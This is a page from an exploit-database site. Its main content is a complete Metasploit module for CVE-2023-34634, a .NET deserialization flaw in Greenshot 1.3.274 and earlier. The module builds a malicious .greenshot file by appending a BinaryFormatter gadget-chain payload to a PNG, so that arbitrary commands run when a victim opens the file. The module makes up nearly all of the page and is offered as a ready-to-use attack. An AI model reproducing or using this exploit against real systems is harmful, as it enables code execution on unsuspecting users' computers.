0day.today - Biggest Exploit Database in the World.
Things you should know about 0day.today:
Administration of this site uses the official contacts. Beware of impostors!
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Greenshot 1.3.274 Deserialization / Command Execution Exploit
Author
Risk
[
Security Risk Critical
]0day-ID
Category
Date add
CVE
Platform
## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::FILEFORMAT include Msf::Post::File def initialize(info = {}) super( update_info( info, 'Name' => 'Greenshot .NET Deserialization Fileformat Exploit', 'Description' => %q{ There exists a .NET deserialization vulnerability in Greenshot version 1.3.274 and below. The deserialization allows the execution of commands when a user opens a Greenshot file. The commands execute under the same permissions as the Greenshot service. Typically, is the logged in user. }, 'DisclosureDate' => '2023-07-26', 'Author' => [ 'p4r4bellum', # Discovery 'bwatters-r7', # msf exploit ], 'References' => [ ['CVE', '2023-34634'], ['EDB', '51633'] ], 'License' => MSF_LICENSE, 'Platform' => 'win', 'Arch' => ARCH_CMD, 'Targets' => [ [ 'Windows', {} ], ], 'Notes' => { 'Stability' => [CRASH_SAFE], 'Reliability' => [REPEATABLE_SESSION], 'SideEffects' => [ARTIFACTS_ON_DISK, SCREEN_EFFECTS] } ) ) register_options([ OptPath.new('PNG_FILE', [false, 'PNG file to use']) ]) end def exploit if datastore['PNG_FILE'].blank? image_file = File.join(Msf::Config.data_directory, 'exploits', 'cve-2023-34634', 'test.png') else image_file = datastore['PNG_FILE'] end datastore['FILENAME'] = Rex::Text.rand_text_alpha(rand(6..13)) if datastore['FILENAME'].blank? if datastore['FILENAME'].length < 10 || datastore['FILENAME'][-10, -1] != '.greenshot' datastore['FILENAME'] << '.greenshot' end cmd = payload.encoded image_data = File.binread(image_file) deserialize_cmd = ::Msf::Util::DotNetDeserialization.generate( cmd, gadget_chain: :WindowsIdentity, formatter: :BinaryFormatter ) payload_length = deserialize_cmd.length outfile = image_data outfile << deserialize_cmd outfile << [payload_length].pack('Q') outfile << 'Greenshot01.02' file_create(outfile) end end # 0day.today [2024-11-15] #